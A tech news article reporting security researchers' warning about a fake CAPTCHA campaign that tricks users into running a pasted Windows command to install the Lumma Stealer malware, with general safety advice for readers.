top of page
OutSystems-business-transformation-with-gen-ai-ad-300x600.jpg
OutSystems-business-transformation-with-gen-ai-ad-728x90.jpg
TechNewsHub_Strip_v1.jpg

LATEST NEWS

Security researchers warn of fake CAPTCHA campaign spreading Lumma malware

Marijan Hassan - Tech Journalist

Security researchers from Netskope Threat Labs have issued a warning about a global cyberattack campaign using fake CAPTCHAs to spread the Lumma Stealer malware. This sophisticated scam has already targeted victims across multiple countries, including the United States, Argentina, and the Philippines. It has also targeted various sectors, from healthcare and banking to marketing and telecom.



The attackers are tricking users into running malicious commands on their computers through cleverly disguised fake CAPTCHA challenges. A CAPTCHA is typically used to verify that a website visitor is human, but in this case, the fake CAPTCHA directs victims to unwittingly execute commands that infect their computers with malware.


Lumma Stealer, the malware being distributed, is a type of software sold as part of the “malware-as-a-service” (MaaS) model, making it accessible to cybercriminals who pay for its use. It has been active since at least 2022 and is designed to steal sensitive data, such as login credentials and financial information.


How It works


Here’s how the attack unfolds:

Redirection to fake CAPTCHA: Victims are redirected to a fraudulent CAPTCHA page that appears legitimate but is part of the infection chain.

Social engineering trick: The fake CAPTCHA asks users to open the Windows Run command by pressing Windows + R, paste a command copied to their clipboard, and press Enter. This action initiates the malware download and execution.

Malware execution: The command uses a built-in Windows tool called mshta.exe to fetch and run a malicious file from a remote server, bypassing browser-based security controls.


Why this attack is dangerous

The fake CAPTCHA attack is a clever form of social engineering. Even tech-savvy users might fall for it, as they believe they are completing a standard CAPTCHA verification. By directing the user to take steps outside the browser, the attackers avoid detection by most cybersecurity tools.


Additionally, the campaign uses advanced techniques to avoid security systems, including:

  • Exploiting trusted Windows tools to execute malicious code.

  • Using open-source code snippets to bypass malware detection.

  • Employing malvertising (malicious ads) to attract victims to their fake CAPTCHA pages.


What you can do to stay safe

Be cautious of CAPTCHAs: If a CAPTCHA asks you to execute commands outside your browser, stop immediately.


  • Use updated security tools: Netskope Advanced Threat Protection provides proactive coverage against many of the different layers involved in this threat.


  • Avoid downloading cracked software: Many attacks begin with fake or pirated software. Stick to legitimate sources.

  • Double-check URLs: Be wary of websites that redirect you unexpectedly or seem suspicious.

wasabi.png
Gamma_300x600.jpg
paypal.png
bottom of page